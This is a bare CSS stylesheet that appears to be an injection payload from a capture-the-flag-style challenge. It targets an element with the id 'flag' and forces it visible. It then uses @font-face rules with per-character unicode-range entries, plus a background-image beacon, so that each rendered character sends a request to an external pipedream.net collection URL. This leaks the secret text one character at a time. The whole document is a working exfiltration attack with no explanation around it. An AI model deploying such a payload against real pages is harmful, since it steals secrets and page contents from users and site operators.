body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W28')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w28,p98w28,p106w28,p112w28,p115w28,p121w28,p122w28,p48w28,p49w28,p52w28,p53w28,p55w28,p125w28,monospace;width:28ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W28');unicode-range:U+0061}
@font-face{font-family:p98w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W28');unicode-range:U+0062}
@font-face{font-family:p106w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W28');unicode-range:U+006A}
@font-face{font-family:p112w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W28');unicode-range:U+0070}
@font-face{font-family:p115w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W28');unicode-range:U+0073}
@font-face{font-family:p121w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W28');unicode-range:U+0079}
@font-face{font-family:p122w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W28');unicode-range:U+007A}
@font-face{font-family:p48w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W28');unicode-range:U+0030}
@font-face{font-family:p49w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W28');unicode-range:U+0031}
@font-face{font-family:p52w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W28');unicode-range:U+0034}
@font-face{font-family:p53w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W28');unicode-range:U+0035}
@font-face{font-family:p55w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W28');unicode-range:U+0037}
@font-face{font-family:p125w28;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W28');unicode-range:U+007D}